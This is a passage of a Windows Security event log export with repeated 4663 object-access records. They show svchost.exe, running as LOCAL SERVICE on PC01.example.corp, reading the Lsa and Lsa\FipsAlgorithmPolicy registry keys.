PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452876 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452875 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452874 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452873 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452872 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452871 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452870 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452869 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452868 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452867 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452866 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452865 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452864 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452863 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452862 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452861 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452860 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452859 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452858 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452857 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452856 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452855 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452854 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452853 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452852 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452851 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452850 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452849 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452848 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452847 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452846 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452845 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452844 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452843 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452842 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452841 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452840 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452839 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452838 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452837 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452836 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452835 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452834 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452833 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452832 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452831 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452830 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 